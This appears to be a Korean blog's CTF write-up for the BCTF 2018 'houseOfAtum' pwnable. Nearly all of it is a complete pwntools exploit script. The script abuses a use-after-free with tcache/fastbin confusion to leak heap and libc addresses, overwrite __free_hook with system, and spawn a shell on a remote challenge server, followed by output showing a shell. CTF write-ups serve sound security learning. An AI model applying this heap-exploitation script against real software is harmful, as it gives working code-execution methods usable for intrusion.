BCTF 2018 - houseOfAtum

Category : pwnable

Summary : uaf, tcache, show function, confusion between tcache and fastbin, 2 notes

Exploit

#!/usr/bin/python

from pwn import *

def cmd_add(data):
    ru('Your choice:')
    ss('1\x00')
    ru('Input the content:')
    ss(data)
    ru('Done!\n')

def cmd_edit(idx, data):
    ru('Your choice:')
    ss('2\x00')
    ru('Input the idx:')
    ss(str(idx)+'\x00')
    ru('Input the content:')
    ss(data)
    ru('Done!\n')

def cmd_del(idx, erase=False):
    ru('Your choice:')
    ss('3\x00')
    ru('Input the idx:')
    ss(str(idx))
    ru('Clear?(y/n):')
    if erase:
        ss('y\x00')
    else:
        ss('n\x00')
    ru('Done!\n')

def cmd_show(idx):
    ru('Your choice:')
    ss('4\x00')
    ru('Input the idx:')
    ss(str(idx))
    ru('Content:')
    res = rl(False)
    ru('Done!\n')
    return res

#s = process('./atum')
s = remote('60.205.224.216', 9999)
ru = s.recvuntil
rl = s.recvline
rr = s.recv
sl = s.sendline
ss = s.send

raw_input('>')

cmd_add('a')
cmd_add('b')
cmd_del(0)
cmd_del(0)

heap_base = u64(cmd_show(0).ljust(8, '\x00')) - 0x260
cmd_edit(0, (p64(0) + p64(0x91)) + (p64(0) + p64(0)) * 2 + (p64(0) + p64(0xa1)) + p64(heap_base+0x68))
cmd_edit(1, (p64(0) + p64(0)) * 3 + (p64(0) + p64(0x11)) + p64(0))
print hex(heap_base)

for _ in range(5):
    cmd_del(0)

cmd_del(1, True)
cmd_del(0, True)

cmd_add('a')    # 0
cmd_add('b')    # 1
cmd_del(1, True)
cmd_add(p64(0)) # 1 : tcache.bins
cmd_del(0, True)
cmd_edit(1, p64(heap_base + 0x80) + (p64(0) + p64((0x250 - 0x70) | 1)))
cmd_add(p64(0)) # 0 : fake_chunk
for i in range(8):
    if i == 7:
        cmd_del(0, True)
    else:
        cmd_del(0)  # into unsorted bin
cmd_edit(1, 'a' * 0x18)
libc_base = u64(cmd_show(1)[0x18:].ljust(8, '\x00')) - 0x3ebca0
print hex(libc_base)
libc_system = libc_base + 0x4f440
libc_free_hook = libc_base + 0x3ed8e8

cmd_edit(1, p64(libc_free_hook) + p64(0) * 4)
cmd_add(p64(libc_system))
cmd_edit(1, 'sh'.ljust(8, '\x00'))

ru('Your choice:')
ss('3\x00')
ru('Input the idx:')
ss('1\x00')

s.interactive()
s.close()

$ python ex.py
[+] Starting local process './atum': pid 29994
0x561917b54000
0x7f6282d24000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)

저작자표시 비영리 변경금지 (새창열림)

'CTF > 2018' 카테고리의 다른 글

SECCON CTF 2018 QUAL - CLV2 (0)	2018.12.06
DEFCON CTF 2018 QUAL - EC3 (0)	2018.12.03
SECCON CTF 2018 QUAL - secret_message (one shot exploit) (0)	2018.11.25
INCTF 2018 - lost (0)	2018.11.04
INCTF 2018 - yawn (0)	2018.11.03

'CTF > 2018' 카테고리의 다른 글

티스토리툴바